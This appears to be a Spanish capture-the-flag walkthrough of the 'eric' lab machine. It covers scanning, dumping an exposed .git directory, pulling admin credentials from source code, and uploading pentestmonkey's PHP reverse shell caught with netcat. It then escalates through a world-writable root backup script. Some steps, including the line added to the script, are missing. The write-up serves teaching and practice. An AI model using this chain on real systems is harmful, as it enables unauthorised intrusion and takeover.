SP: eric GitTools - danielcastropalomares/security GitHub Wiki
Con un primer escaneo:
root@kali:~# nmap -p- 172.31.255.102
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-02 20:11 CEST
Nmap scan report for pinkys-palace (172.31.255.102)
Host is up (0.000096s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:05:BC:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.95 seconds
root@kali:~# nmap -A 172.31.255.102
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-02 20:11 CEST
Nmap scan report for pinkys-palace (172.31.255.102)
Host is up (0.00058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 172.31.255.102:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: minor changes
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Blog under construction
MAC Address: 08:00:27:05:BC:25 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms pinkys-palace (172.31.255.102)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds
Encontramos un servidor web y un servidor SSH, probamos con nikto y encontramos un admin.php y un directorio .git:
root@kali:~# nikto -host 172.31.255.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.102
+ Target Hostname: 172.31.255.102
+ Target Port: 80
+ Start Time: 2019-05-02 20:13:17 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7535 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2019-05-02 20:13:29 (GMT2) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.29) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Exploramos el directorio git:
root@kali:~# curl http://172.31.255.102/.git/HEAD
ref: refs/heads/master
Creamos un directorio temporal para realizar un dump del directorio .git:
root@kali:/usr/local/src/Osmedeus# mkdir /tmp/dumper
Con la herramienta GitTool hacemos un dump:
git clone https://github.com/internetwache/GitTools.git
root@kali:/usr/local/src/GitTools/Dumper# ./gitdumper.sh http://172.31.255.102/.git/ /tmp/dumper
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Downloaded: objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Downloaded: objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[+] Downloaded: objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[+] Downloaded: objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[+] Downloaded: objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[+] Downloaded: objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[+] Downloaded: objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb
Con la propia aplicación extractor restauramos los archivos:
root@kali:/usr/local/src/GitTools/Extractor# ./extractor.sh /tmp/dumper /tmp/extractor
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: 3db5628b550f5c9c9f6f663cd158374035a6eaa0
[+] Found file: /tmp/extractor/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/admin.php
[+] Found file: /tmp/extractor/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/index.php
[+] Found commit: a89a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Found file: /tmp/extractor/1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/admin.php
[+] Found file: /tmp/extractor/1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/index.php
[+] Found commit: cc1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Found file: /tmp/extractor/2-cc1ab96950f56d1fff0d1f006821cab6b6b0e249/index.php
En el último commit encontramos las credenciales en el fichero admin.php:
root@kali:/tmp/extractor# cat 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/admin.php | more
<?php
ob_start();
session_start();
if ($_POST['submit']) {
if ($_POST['username'] == 'admin' && $_POST['password'] == '[email protected]$glo0mappL3') {
$_SESSION['auth'] = 1;
} else {
<exit("Wrong username and/or password. Don't even bother bruteforcing.");
admin: [email protected]$glo0mappL3
Volvemos a acceder vía web al apartado admin.php y utilizamos las credenciales anteriores. Ahora nos encontramos con un formulario para subir archivos:
Vamos a subir una reverse shell:
root@kali:/tmp# wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
root@kali:/tmp# tar -xvzf php-reverse-shell-1.0.tar.gz
Dentro del fichero php configuraremos la IP de nuestro kali y un puerto aleatorio:
root@kali:/tmp/php-reverse-shell-1.0# vi php-reverse-shell.php
Abrimos una sesión de netcat en nuestro kali:
root@kali:/tmp/extractor# nc -vlp 9988
listening on [any] 9988 ...
Ahora accedemos vía web al directorio uploads y abrimos la shell que hemos subido:
Y ya veremos abierta nuestra shell en netcat:
root@kali:/tmp/extractor# nc -vlp 9988
listening on [any] 9988 ...
connect to [172.31.255.129] from pinkys-palace [172.31.255.102] 52678
Linux eric 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
20:45:40 up 1:00, 0 users, load average: 0.00, 0.03, 0.84
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
A nivel de crontab no encontramos ningún script programado:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
En el directorio cron.d tampoco encontramos nada:
$ ls -liath /etc/cron.d
total 20K
128513 drwxr-xr-x 81 root root 4.0K Oct 28 2018 ..
129431 drwxr-xr-x 2 root root 4.0K Oct 28 2018 .
130883 -rw-r--r-- 1 root root 190 Oct 21 2018 popularity-contest
160634 -rw-r--r-- 1 root root 712 Jan 18 2018 php
129432 -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
Abrimos una shell con python:
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@eric:/$
Buscamos procesos ejecutados como root:
$ ps aux | grep root
root 1 0.0 0.8 159304 8700 ? Ss 19:44 0:01 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 19:44 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 19:44 0:00 [kworker/0:0H]
root 5 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u2:0]
root 6 0.0 0.0 0 0 ? I< 19:44 0:00 [mm_percpu_wq]
root 7 0.1 0.0 0 0 ? S 19:44 0:04 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 19:44 0:00 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 19:44 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 19:44 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 19:44 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 19:44 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 19:44 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 19:44 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 19:44 0:00 [rcu_tasks_kthre]
root 16 0.0 0.0 0 0 ? S 19:44 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 19:44 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 19:44 0:00 [oom_reaper]
root 19 0.0 0.0 0 0 ? I< 19:44 0:00 [writeback]
root 20 0.0 0.0 0 0 ? S 19:44 0:00 [kcompactd0]
root 21 0.0 0.0 0 0 ? SN 19:44 0:00 [ksmd]
root 22 0.0 0.0 0 0 ? SN 19:44 0:00 [khugepaged]
root 23 0.0 0.0 0 0 ? I< 19:44 0:00 [crypto]
root 24 0.0 0.0 0 0 ? I< 19:44 0:00 [kintegrityd]
root 25 0.0 0.0 0 0 ? I< 19:44 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? I< 19:44 0:00 [ata_sff]
root 27 0.0 0.0 0 0 ? I< 19:44 0:00 [md]
root 28 0.0 0.0 0 0 ? I< 19:44 0:00 [edac-poller]
root 29 0.0 0.0 0 0 ? I< 19:44 0:00 [devfreq_wq]
root 30 0.0 0.0 0 0 ? I< 19:44 0:00 [watchdogd]
root 34 0.0 0.0 0 0 ? S 19:44 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? S 19:44 0:00 [ecryptfs-kthrea]
root 77 0.0 0.0 0 0 ? I< 19:44 0:00 [kthrotld]
root 78 0.0 0.0 0 0 ? I< 19:44 0:00 [acpi_thermal_pm]
root 79 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_0]
root 80 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_0]
root 81 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_1]
root 82 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_1]
root 85 0.0 0.0 0 0 ? I 19:44 0:01 [kworker/0:2]
root 89 0.0 0.0 0 0 ? I< 19:44 0:00 [ipv6_addrconf]
root 98 0.0 0.0 0 0 ? I< 19:44 0:00 [kstrp]
root 115 0.0 0.0 0 0 ? I< 19:44 0:00 [charger_manager]
root 161 0.0 0.0 0 0 ? I< 19:44 0:00 [kworker/0:1H]
root 162 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_2]
root 163 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_2]
root 184 0.0 0.0 0 0 ? S 19:44 0:00 [jbd2/sda1-8]
root 185 0.0 0.0 0 0 ? I< 19:44 0:00 [ext4-rsv-conver]
root 213 0.0 1.0 94788 10216 ? S<s 19:44 0:00 /lib/systemd/systemd-journald
root 241 0.0 0.5 46252 5196 ? Ss 19:44 0:00 /lib/systemd/systemd-udevd
root 316 0.0 0.0 0 0 ? I< 19:44 0:00 [iprt-VBoxWQueue]
root 322 0.0 0.0 0 0 ? I< 19:44 0:00 [ttm_swap]
root 340 0.0 1.7 170412 17552 ? Ssl 19:44 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 343 0.0 0.7 289840 7100 ? Ssl 19:44 0:00 /usr/lib/accountsservice/accounts-daemon
root 348 0.0 0.3 31320 3164 ? Ss 19:44 0:00 /usr/sbin/cron -f
root 349 0.0 0.5 62004 5576 ? Ss 19:44 0:00 /lib/systemd/systemd-logind
root 468 0.0 0.5 72296 5628 ? Ss 19:44 0:00 /usr/sbin/sshd -D
root 469 0.0 1.8 326624 18328 ? Ss 19:44 0:00 /usr/sbin/apache2 -k start
root 471 0.0 0.1 16180 1888 tty1 Ss+ 19:44 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1038 0.0 0.0 0 0 ? I 20:44 0:00 [kworker/u2:2]
root 1061 0.0 0.0 0 0 ? I 20:48 0:00 [kworker/0:1]
root 1065 0.0 0.0 0 0 ? I 20:49 0:00 [kworker/u2:1]
www-data 1084 0.0 0.1 11464 1104 ? S 20:54 0:00 grep root
Buscamos archivos con el SUID modificado:
www-data@eric:/$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/traceroute6.iputils
Encontramos un script llamado backup.sh donde los permisos de escritura son write para todo el mundo:
www-data@eric:/$ find / -perm -o=w -type f 2>/dev/null | grep -v proc
/home/eric/backup.sh
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
El script en cuestión:
www-data@eric:/home/eric$ cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
En la home de eric encontramos la primera flag:
Parece que el script anterior, se ejecuta cada determinado tiempo, aunque no lo he visto a nivel de cron. Ya que la fecha del .zip está variando constantemente:
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:06 .
7214 -rw-r--r-- 1 root root 26K May 2 21:06 backup.zip
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:12 .
7214 -rw-r--r-- 1 root root 26K May 2 21:12 backup.zip
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:15 .
33033 -rw-r--r-- 1 root root 26K May 2 21:15 backup.zip
Y el archivo resultante backup.zip tiene como propietario el usuario root. Vamos a aprovecharnos de esto y añadir lo siguiente en el script de backup:
Ahora esperaremos unos minutos y ya veremos el archivo creado:
www-data@eric:/home/eric$ cat /etc/sudoers.d/www-data
cat: /etc/sudoers.d/www-data: Permission denied
Ahora llegamos a root con sudo: